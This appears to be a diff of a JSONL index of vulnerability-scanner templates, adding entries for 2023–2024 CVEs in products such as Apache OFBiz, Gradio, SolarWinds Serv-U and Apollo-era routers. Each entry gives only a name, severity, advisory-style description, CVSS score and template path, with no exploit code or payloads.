{"ID":"CVE-2023-50968","Info":{"Name":"Apache OFBiz \u003c 18.12.11 - Server Side Request Forgery","Severity":"high","Description":"Arbitrary file properties reading vulnerability in Apache Software Foundation Apache OFBiz when user operates an uri call without authorizations. The same uri can be operated to realize a SSRF attack also without authorizations. Users are recommended to upgrade to version 18.12.11, which fixes this issue.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-50968.yaml"}
|
||||||
|
{"ID":"CVE-2023-51449","Info":{"Name":"Gradio Hugging Face - Local File Inclusion","Severity":"high","Description":"Gradio LFI when auth is not enabled, affects versions 4.0 - 4.10, also works against Gradio \u003c 3.33\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-51449.yaml"}
|
||||||
{"ID":"CVE-2023-51467","Info":{"Name":"Apache OFBiz \u003c 18.12.11 - Remote Code Execution","Severity":"critical","Description":"The vulnerability allows attackers to bypass authentication to achieve a simple Server-Side Request Forgery (SSRF)\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-51467.yaml"}
|
{"ID":"CVE-2023-51467","Info":{"Name":"Apache OFBiz \u003c 18.12.11 - Remote Code Execution","Severity":"critical","Description":"The vulnerability allows attackers to bypass authentication to achieve a simple Server-Side Request Forgery (SSRF)\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-51467.yaml"}
|
||||||
{"ID":"CVE-2023-52085","Info":{"Name":"Winter CMS Local File Inclusion - (LFI)","Severity":"medium","Description":"Winter is a free, open-source content management system. Users with access to backend forms that include a ColorPicker FormWidget can provide a value that would then be included without further processing in the compilation of custom stylesheets via LESS. This had the potential to lead to a Local File Inclusion vulnerability. This issue has been patched in v1.2.4.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-52085.yaml"}
|
{"ID":"CVE-2023-52085","Info":{"Name":"Winter CMS Local File Inclusion - (LFI)","Severity":"medium","Description":"Winter is a free, open-source content management system. Users with access to backend forms that include a ColorPicker FormWidget can provide a value that would then be included without further processing in the compilation of custom stylesheets via LESS. This had the potential to lead to a Local File Inclusion vulnerability. This issue has been patched in v1.2.4.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-52085.yaml"}
|
||||||
{"ID":"CVE-2023-5244","Info":{"Name":"Microweber \u003c V.2.0 - Cross-Site Scripting","Severity":"medium","Description":"Reflected Cross-Site Scripting Vulnerability in types GET parameter on the /editor_tools/rte_image_editor endpoint.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5244.yaml"}
|
{"ID":"CVE-2023-5244","Info":{"Name":"Microweber \u003c V.2.0 - Cross-Site Scripting","Severity":"medium","Description":"Reflected Cross-Site Scripting Vulnerability in types GET parameter on the /editor_tools/rte_image_editor endpoint.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5244.yaml"}
|
||||||
|
@ -2375,6 +2376,7 @@
|
||||||
{"ID":"CVE-2024-1561","Info":{"Name":"Gradio Applications - Local File Read","Severity":"high","Description":"Local file read by calling arbitrary methods of Components class\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-1561.yaml"}
|
{"ID":"CVE-2024-1561","Info":{"Name":"Gradio Applications - Local File Read","Severity":"high","Description":"Local file read by calling arbitrary methods of Components class\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-1561.yaml"}
|
||||||
{"ID":"CVE-2024-1698","Info":{"Name":"NotificationX \u003c= 2.8.2 - SQL Injection","Severity":"critical","Description":"The NotificationX - Best FOMO, Social Proof, WooCommerce Sales Popup \u0026 Notification Bar Plugin With Elementor plugin for WordPress is vulnerable to SQL Injection via the 'type' parameter in all versions up to, and including, 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1698.yaml"}
|
{"ID":"CVE-2024-1698","Info":{"Name":"NotificationX \u003c= 2.8.2 - SQL Injection","Severity":"critical","Description":"The NotificationX - Best FOMO, Social Proof, WooCommerce Sales Popup \u0026 Notification Bar Plugin With Elementor plugin for WordPress is vulnerable to SQL Injection via the 'type' parameter in all versions up to, and including, 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1698.yaml"}
|
||||||
{"ID":"CVE-2024-1709","Info":{"Name":"ConnectWise ScreenConnect 23.9.7 - Authentication Bypass","Severity":"critical","Description":"ConnectWise ScreenConnect 23.9.7 and prior are affected by an Authentication Bypass Using an Alternate Path or Channel vulnerability, which may allow an attacker direct access to confidential information or critical systems.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-1709.yaml"}
|
{"ID":"CVE-2024-1709","Info":{"Name":"ConnectWise ScreenConnect 23.9.7 - Authentication Bypass","Severity":"critical","Description":"ConnectWise ScreenConnect 23.9.7 and prior are affected by an Authentication Bypass Using an Alternate Path or Channel vulnerability, which may allow an attacker direct access to confidential information or critical systems.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-1709.yaml"}
|
||||||
|
{"ID":"CVE-2024-1728","Info":{"Name":"Gradio \u003e 4.19.1 UploadButton - Path Traversal","Severity":"high","Description":"gradio-app/gradio is vulnerable to a local file inclusion vulnerability due to improper validation of user-supplied input in the UploadButton component.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-1728.yaml"}
|
||||||
{"ID":"CVE-2024-20767","Info":{"Name":"Adobe ColdFusion - Arbitrary File Read","Severity":"high","Description":"ColdFusion versions 2023.6, 2021.12 and earlier are affected by an Improper Access Control vulnerability that could lead to arbitrary file system read. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access to sensitive files and perform arbitrary file system write. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2024/CVE-2024-20767.yaml"}
|
{"ID":"CVE-2024-20767","Info":{"Name":"Adobe ColdFusion - Arbitrary File Read","Severity":"high","Description":"ColdFusion versions 2023.6, 2021.12 and earlier are affected by an Improper Access Control vulnerability that could lead to arbitrary file system read. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access to sensitive files and perform arbitrary file system write. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2024/CVE-2024-20767.yaml"}
|
||||||
{"ID":"CVE-2024-21644","Info":{"Name":"pyLoad Flask Config - Access Control","Severity":"high","Description":"pyLoad is the free and open-source Download Manager written in pure Python. Any unauthenticated user can browse to a specific URL to expose the Flask config, including the `SECRET_KEY` variable. This issue has been patched in version 0.5.0b3.dev77.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-21644.yaml"}
|
{"ID":"CVE-2024-21644","Info":{"Name":"pyLoad Flask Config - Access Control","Severity":"high","Description":"pyLoad is the free and open-source Download Manager written in pure Python. Any unauthenticated user can browse to a specific URL to expose the Flask config, including the `SECRET_KEY` variable. This issue has been patched in version 0.5.0b3.dev77.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-21644.yaml"}
|
||||||
{"ID":"CVE-2024-21645","Info":{"Name":"pyload - Log Injection","Severity":"medium","Description":"A log injection vulnerability was identified in pyload. This vulnerability allows any unauthenticated actor to inject arbitrary messages into the logs gathered by pyload.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-21645.yaml"}
|
{"ID":"CVE-2024-21645","Info":{"Name":"pyload - Log Injection","Severity":"medium","Description":"A log injection vulnerability was identified in pyload. This vulnerability allows any unauthenticated actor to inject arbitrary messages into the logs gathered by pyload.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-21645.yaml"}
|
||||||
|
@ -2395,6 +2397,7 @@
|
||||||
{"ID":"CVE-2024-25600","Info":{"Name":"Unauthenticated Remote Code Execution – Bricks \u003c= 1.9.6","Severity":"critical","Description":"Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks \u003c= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25600.yaml"}
|
{"ID":"CVE-2024-25600","Info":{"Name":"Unauthenticated Remote Code Execution – Bricks \u003c= 1.9.6","Severity":"critical","Description":"Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks \u003c= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25600.yaml"}
|
||||||
{"ID":"CVE-2024-25669","Info":{"Name":"CaseAware a360inc - Cross-Site Scripting","Severity":"medium","Description":"a360inc CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. This is a bypass of the fix reported in CVE-2017-\u003e\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-25669.yaml"}
|
{"ID":"CVE-2024-25669","Info":{"Name":"CaseAware a360inc - Cross-Site Scripting","Severity":"medium","Description":"a360inc CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. This is a bypass of the fix reported in CVE-2017-\u003e\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-25669.yaml"}
|
||||||
{"ID":"CVE-2024-25735","Info":{"Name":"WyreStorm Apollo VX20 - Information Disclosure","Severity":"high","Description":"An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25735.yaml"}
|
{"ID":"CVE-2024-25735","Info":{"Name":"WyreStorm Apollo VX20 - Information Disclosure","Severity":"high","Description":"An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25735.yaml"}
|
||||||
|
{"ID":"CVE-2024-2621","Info":{"Name":"Fujian Kelixin Communication - Command Injection","Severity":"medium","Description":"A vulnerability was found in Fujian Kelixin Communication Command and Dispatch Platform up to 20240318 and classified as critical. Affected by this issue is some unknown functionality of the file api/client/user/pwd_update.php.\n","Classification":{"CVSSScore":"6.3"}},"file_path":"http/cves/2024/CVE-2024-2621.yaml"}
|
||||||
{"ID":"CVE-2024-26331","Info":{"Name":"ReCrystallize Server - Authentication Bypass","Severity":"high","Description":"This vulnerability allows an attacker to bypass authentication in the ReCrystallize Server application by manipulating the 'AdminUsername' cookie. This gives the attacker administrative access to the application's functionality, even when the default password has been changed.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-26331.yaml"}
|
{"ID":"CVE-2024-26331","Info":{"Name":"ReCrystallize Server - Authentication Bypass","Severity":"high","Description":"This vulnerability allows an attacker to bypass authentication in the ReCrystallize Server application by manipulating the 'AdminUsername' cookie. This gives the attacker administrative access to the application's functionality, even when the default password has been changed.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-26331.yaml"}
|
||||||
{"ID":"CVE-2024-27198","Info":{"Name":"TeamCity \u003c 2023.11.4 - Authentication Bypass","Severity":"critical","Description":"In JetBrains TeamCity before 2023.11.4 authentication bypass allowing to perform admin actions was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-27198.yaml"}
|
{"ID":"CVE-2024-27198","Info":{"Name":"TeamCity \u003c 2023.11.4 - Authentication Bypass","Severity":"critical","Description":"In JetBrains TeamCity before 2023.11.4 authentication bypass allowing to perform admin actions was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-27198.yaml"}
|
||||||
{"ID":"CVE-2024-27199","Info":{"Name":"TeamCity \u003c 2023.11.4 - Authentication Bypass","Severity":"high","Description":"In JetBrains TeamCity before 2023.11.4 path traversal allowing to perform limited admin actions was possible\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-27199.yaml"}
|
{"ID":"CVE-2024-27199","Info":{"Name":"TeamCity \u003c 2023.11.4 - Authentication Bypass","Severity":"high","Description":"In JetBrains TeamCity before 2023.11.4 path traversal allowing to perform limited admin actions was possible\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-27199.yaml"}
|
||||||
|
@ -2407,15 +2410,18 @@
|
||||||
{"ID":"CVE-2024-28734","Info":{"Name":"Coda v.2024Q1 - Cross-Site Scripting","Severity":"medium","Description":"Cross Site Scripting vulnerability in Unit4 Financials by Coda v.2024Q1 allows a remote attacker to escalate privileges via a crafted script to the cols parameter.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-28734.yaml"}
|
{"ID":"CVE-2024-28734","Info":{"Name":"Coda v.2024Q1 - Cross-Site Scripting","Severity":"medium","Description":"Cross Site Scripting vulnerability in Unit4 Financials by Coda v.2024Q1 allows a remote attacker to escalate privileges via a crafted script to the cols parameter.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-28734.yaml"}
|
||||||
{"ID":"CVE-2024-2876","Info":{"Name":"Wordpress Email Subscribers by Icegram Express - SQL Injection","Severity":"critical","Description":"The Email Subscribers by Icegram Express - Email Marketing, Newsletters, Automation for WordPress \u0026 WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'run' function of the 'IG_ES_Subscribers_Query' class in all versions up to, and including, 5.7.14 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-2876.yaml"}
|
{"ID":"CVE-2024-2876","Info":{"Name":"Wordpress Email Subscribers by Icegram Express - SQL Injection","Severity":"critical","Description":"The Email Subscribers by Icegram Express - Email Marketing, Newsletters, Automation for WordPress \u0026 WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'run' function of the 'IG_ES_Subscribers_Query' class in all versions up to, and including, 5.7.14 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-2876.yaml"}
|
||||||
{"ID":"CVE-2024-2879","Info":{"Name":"WordPress Plugin LayerSlider 7.9.11-7.10.0 - SQL Injection","Severity":"high","Description":"The LayerSlider plugin for WordPress is vulnerable to SQL Injection via the ls_get_popup_markup action in versions 7.9.11 and 7.10.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-2879.yaml"}
|
{"ID":"CVE-2024-2879","Info":{"Name":"WordPress Plugin LayerSlider 7.9.11-7.10.0 - SQL Injection","Severity":"high","Description":"The LayerSlider plugin for WordPress is vulnerable to SQL Injection via the ls_get_popup_markup action in versions 7.9.11 and 7.10.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-2879.yaml"}
|
||||||
|
{"ID":"CVE-2024-28995","Info":{"Name":"SolarWinds Serv-U - Directory Traversal","Severity":"high","Description":"SolarWinds Serv-U was susceptible to a directory transversal vulnerability that would allow access to read sensitive files on the host machine.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-28995.yaml"}
|
||||||
{"ID":"CVE-2024-29059","Info":{"Name":".NET Framework - Leaking ObjRefs via HTTP .NET Remoting","Severity":"high","Description":".NET Framework Information Disclosure Vulnerability","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-29059.yaml"}
|
{"ID":"CVE-2024-29059","Info":{"Name":".NET Framework - Leaking ObjRefs via HTTP .NET Remoting","Severity":"high","Description":".NET Framework Information Disclosure Vulnerability","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-29059.yaml"}
|
||||||
{"ID":"CVE-2024-29269","Info":{"Name":"Telesquare TLR-2005KSH - Remote Command Execution","Severity":"critical","Description":"Telesquare Tlr-2005Ksh is a Sk Telecom Lte router from South Korea's Telesquare company.Telesquare TLR-2005Ksh versions 1.0.0 and 1.1.4 have an unauthorized remote command execution vulnerability. An attacker can exploit this vulnerability to execute system commands without authorization through the Cmd parameter and obtain server permissions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-29269.yaml"}
|
{"ID":"CVE-2024-29269","Info":{"Name":"Telesquare TLR-2005KSH - Remote Command Execution","Severity":"critical","Description":"Telesquare Tlr-2005Ksh is a Sk Telecom Lte router from South Korea's Telesquare company.Telesquare TLR-2005Ksh versions 1.0.0 and 1.1.4 have an unauthorized remote command execution vulnerability. An attacker can exploit this vulnerability to execute system commands without authorization through the Cmd parameter and obtain server permissions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-29269.yaml"}
|
||||||
{"ID":"CVE-2024-3097","Info":{"Name":"NextGEN Gallery \u003c= 3.59 - Missing Authorization to Unauthenticated Information Disclosure","Severity":"medium","Description":"The WordPress Gallery Plugin – NextGEN Gallery plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the get_item function in versions up to, and including, 3.59. This makes it possible for unauthenticated attackers to extract sensitive data including EXIF and other metadata of any image uploaded through the plugin.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-3097.yaml"}
|
{"ID":"CVE-2024-3097","Info":{"Name":"NextGEN Gallery \u003c= 3.59 - Missing Authorization to Unauthenticated Information Disclosure","Severity":"medium","Description":"The WordPress Gallery Plugin – NextGEN Gallery plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the get_item function in versions up to, and including, 3.59. This makes it possible for unauthenticated attackers to extract sensitive data including EXIF and other metadata of any image uploaded through the plugin.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-3097.yaml"}
|
||||||
{"ID":"CVE-2024-3136","Info":{"Name":"MasterStudy LMS \u003c= 3.3.3 - Unauthenticated Local File Inclusion via template","Severity":"critical","Description":"The MasterStudy LMS plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.3.3 via the 'template' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \"safe\" file types can be uploaded and included.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-3136.yaml"}
|
{"ID":"CVE-2024-3136","Info":{"Name":"MasterStudy LMS \u003c= 3.3.3 - Unauthenticated Local File Inclusion via template","Severity":"critical","Description":"The MasterStudy LMS plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.3.3 via the 'template' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \"safe\" file types can be uploaded and included.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-3136.yaml"}
|
||||||
{"ID":"CVE-2024-31621","Info":{"Name":"Flowise 1.6.5 - Authentication Bypass","Severity":"high","Description":"The flowise version \u003c= 1.6.5 is vulnerable to authentication bypass vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-31621.yaml"}
|
{"ID":"CVE-2024-31621","Info":{"Name":"Flowise 1.6.5 - Authentication Bypass","Severity":"high","Description":"The flowise version \u003c= 1.6.5 is vulnerable to authentication bypass vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-31621.yaml"}
|
||||||
|
{"ID":"CVE-2024-31750","Info":{"Name":"F-logic DataCube3 - SQL Injection","Severity":"high","Description":"SQL injection vulnerability in f-logic datacube3 v.1.0 allows a remote attacker to obtain sensitive information via the req_id parameter.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-31750.yaml"}
|
||||||
{"ID":"CVE-2024-31848","Info":{"Name":"CData API Server \u003c 23.4.8844 - Path Traversal","Severity":"critical","Description":"A path traversal vulnerability exists in the Java version of CData API Server \u003c 23.4.8844 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-31848.yaml"}
|
{"ID":"CVE-2024-31848","Info":{"Name":"CData API Server \u003c 23.4.8844 - Path Traversal","Severity":"critical","Description":"A path traversal vulnerability exists in the Java version of CData API Server \u003c 23.4.8844 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-31848.yaml"}
|
||||||
{"ID":"CVE-2024-31849","Info":{"Name":"CData Connect \u003c 23.4.8846 - Path Traversal","Severity":"critical","Description":"A path traversal vulnerability exists in the Java version of CData Connect \u003c 23.4.8846 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-31849.yaml"}
|
{"ID":"CVE-2024-31849","Info":{"Name":"CData Connect \u003c 23.4.8846 - Path Traversal","Severity":"critical","Description":"A path traversal vulnerability exists in the Java version of CData Connect \u003c 23.4.8846 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-31849.yaml"}
|
||||||
{"ID":"CVE-2024-31850","Info":{"Name":"CData Arc \u003c 23.4.8839 - Path Traversal","Severity":"high","Description":"A path traversal vulnerability exists in the Java version of CData Arc \u003c 23.4.8839 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain access to sensitive information and perform limited actions.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2024/CVE-2024-31850.yaml"}
|
{"ID":"CVE-2024-31850","Info":{"Name":"CData Arc \u003c 23.4.8839 - Path Traversal","Severity":"high","Description":"A path traversal vulnerability exists in the Java version of CData Arc \u003c 23.4.8839 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain access to sensitive information and perform limited actions.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2024/CVE-2024-31850.yaml"}
|
||||||
{"ID":"CVE-2024-31851","Info":{"Name":"CData Sync \u003c 23.4.8843 - Path Traversal","Severity":"high","Description":"A path traversal vulnerability exists in the Java version of CData Sync \u003c 23.4.8843 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain access to sensitive information and perform limited actions.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2024/CVE-2024-31851.yaml"}
|
{"ID":"CVE-2024-31851","Info":{"Name":"CData Sync \u003c 23.4.8843 - Path Traversal","Severity":"high","Description":"A path traversal vulnerability exists in the Java version of CData Sync \u003c 23.4.8843 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain access to sensitive information and perform limited actions.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2024/CVE-2024-31851.yaml"}
|
||||||
|
{"ID":"CVE-2024-32113","Info":{"Name":"Apache OFBiz Directory Traversal - Remote Code Execution","Severity":"high","Description":"Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache OFBiz.This issue affects Apache OFBiz: before 18.12.13\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-32113.yaml"}
|
||||||
{"ID":"CVE-2024-32399","Info":{"Name":"RaidenMAILD Mail Server v.4.9.4 - Path Traversal","Severity":"high","Description":"Directory Traversal vulnerability in RaidenMAILD Mail Server v.4.9.4 and before allows a remote attacker to obtain sensitive information via the /webeditor/ component.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-32399.yaml"}
|
{"ID":"CVE-2024-32399","Info":{"Name":"RaidenMAILD Mail Server v.4.9.4 - Path Traversal","Severity":"high","Description":"Directory Traversal vulnerability in RaidenMAILD Mail Server v.4.9.4 and before allows a remote attacker to obtain sensitive information via the /webeditor/ component.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-32399.yaml"}
|
||||||
{"ID":"CVE-2024-32640","Info":{"Name":"Mura/Masa CMS - SQL Injection","Severity":"critical","Description":"The Mura/Masa CMS is vulnerable to SQL Injection.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-32640.yaml"}
|
{"ID":"CVE-2024-32640","Info":{"Name":"Mura/Masa CMS - SQL Injection","Severity":"critical","Description":"The Mura/Masa CMS is vulnerable to SQL Injection.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-32640.yaml"}
|
||||||
{"ID":"CVE-2024-32651","Info":{"Name":"Change Detection - Server Side Template Injection","Severity":"critical","Description":"A Server Side Template Injection in changedetection.io caused by usage of unsafe functions of Jinja2 allows Remote Command Execution on the server host.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-32651.yaml"}
|
{"ID":"CVE-2024-32651","Info":{"Name":"Change Detection - Server Side Template Injection","Severity":"critical","Description":"A Server Side Template Injection in changedetection.io caused by usage of unsafe functions of Jinja2 allows Remote Command Execution on the server host.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-32651.yaml"}
|
||||||
|
@ -2426,6 +2432,7 @@
|
||||||
{"ID":"CVE-2024-3400","Info":{"Name":"GlobalProtect - OS Command Injection","Severity":"critical","Description":"A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-3400.yaml"}
|
{"ID":"CVE-2024-3400","Info":{"Name":"GlobalProtect - OS Command Injection","Severity":"critical","Description":"A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-3400.yaml"}
|
||||||
{"ID":"CVE-2024-34470","Info":{"Name":"HSC Mailinspector 5.2.17-3 through 5.2.18 - Local File Inclusion","Severity":"high","Description":"An Unauthenticated Path Traversal vulnerability exists in the /public/loaderphp file The path parameter does not properly filter whether the file and directory passed are part of the webroot, allowing an attacker to read arbitrary files on the server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-34470.yaml"}
|
{"ID":"CVE-2024-34470","Info":{"Name":"HSC Mailinspector 5.2.17-3 through 5.2.18 - Local File Inclusion","Severity":"high","Description":"An Unauthenticated Path Traversal vulnerability exists in the /public/loaderphp file The path parameter does not properly filter whether the file and directory passed are part of the webroot, allowing an attacker to read arbitrary files on the server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-34470.yaml"}
|
||||||
{"ID":"CVE-2024-3495","Info":{"Name":"Wordpress Country State City Dropdown \u003c=2.7.2 - SQL Injection","Severity":"critical","Description":"The Country State City Dropdown CF7 plugin for WordPress is vulnerable to SQL Injection via the ‘cnt’ and 'sid' parameters in versions up to, and including, 2.7.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-3495.yaml"}
|
{"ID":"CVE-2024-3495","Info":{"Name":"Wordpress Country State City Dropdown \u003c=2.7.2 - SQL Injection","Severity":"critical","Description":"The Country State City Dropdown CF7 plugin for WordPress is vulnerable to SQL Injection via the ‘cnt’ and 'sid' parameters in versions up to, and including, 2.7.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-3495.yaml"}
|
||||||
|
